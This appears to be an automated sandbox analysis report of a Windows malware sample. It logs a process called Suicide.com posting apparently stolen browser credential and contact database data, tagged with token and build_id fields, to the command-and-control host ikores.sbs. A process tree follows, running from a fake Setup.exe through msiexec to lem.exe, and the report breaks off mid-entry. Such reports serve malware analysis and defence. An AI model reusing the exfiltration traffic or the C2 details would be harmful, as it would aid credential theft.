13	192.168.2.5	49968	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:59 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----Q1N7GVSR9H47QQ1V3WLN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:59 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 Data Ascii: ------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------Q1N7GVSR9H47QQ1V3WLNCont
2024-12-05 20:51:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:59 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:51:59 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:52:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:52:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49974	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:52:01 UTC	320	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L6XTRI5F3EKFUAA16PP8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 49 35 46 33 45 4b 46 55 41 41 31 36 50 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 49 35 46 33 45 4b 46 55 41 41 31 36 50 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 49 35 46 33 45 4b 46 55 41 41 31 36 50 50 38 0d 0a 43 6f 6e 74 Data Ascii: ------L6XTRI5F3EKFUAA16PP8Content-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------L6XTRI5F3EKFUAA16PP8Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------L6XTRI5F3EKFUAA16PP8Cont
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:01 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-05 20:52:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:52:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:52:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49977	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:52:02 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L6XTRI5F3EKFUAA16PP8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:52:02 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 49 35 46 33 45 4b 46 55 41 41 31 36 50 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 49 35 46 33 45 4b 46 55 41 41 31 36 50 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 49 35 46 33 45 4b 46 55 41 41 31 36 50 50 38 0d 0a 43 6f 6e 74 Data Ascii: ------L6XTRI5F3EKFUAA16PP8Content-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------L6XTRI5F3EKFUAA16PP8Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------L6XTRI5F3EKFUAA16PP8Cont
2024-12-05 20:52:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:52:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:52:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Target ID:	0
Start time:	15:49:55
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x6e0000
File size:	7'492'602 bytes
MD5 hash:	6DE99EE6752927E6A33373893D2CFC05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:49:56
Start date:	05/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff72a8b0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:49:56
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 82260A52980C2844E9E250AB0420C526 C
Imagebase:	0x7c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:49:56
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\Setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Setup.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733431593 "
Imagebase:	0x7c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:49:56
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 940B1FE1CFD6E428C01CBEAC4D3DBCDC C
Imagebase:	0x7c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:50:07
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding F4149E57099CE1AEFABD5D1B5FEFF577
Imagebase:	0x7c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:50:08
Start date:	05/12/2024
Path:	C:\Windows\Installer\MSIA1F4.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSIA1F4.tmp" /DontWait "C:\Users\Public\Desktop\Setup.exe"
Imagebase:	0x580000
File size:	420'864 bytes
MD5 hash:	DAEFCC204211C3D179EACC0C6EE4BCC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:50:08
Start date:	05/12/2024
Path:	C:\Users\Public\Desktop\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Desktop\Setup.exe"
Imagebase:	0x7ff79ebe0000
File size:	1'074'688 bytes
MD5 hash:	7CD7B906FB5F3E5273F26DE707A33037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:50:13
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\lem.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\lem.exe
Imagebase:	0x400000
File size:	1'192'690 bytes
MD5 hash:	82CCD973E00420A4768BC76D2F442F52
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:50:13
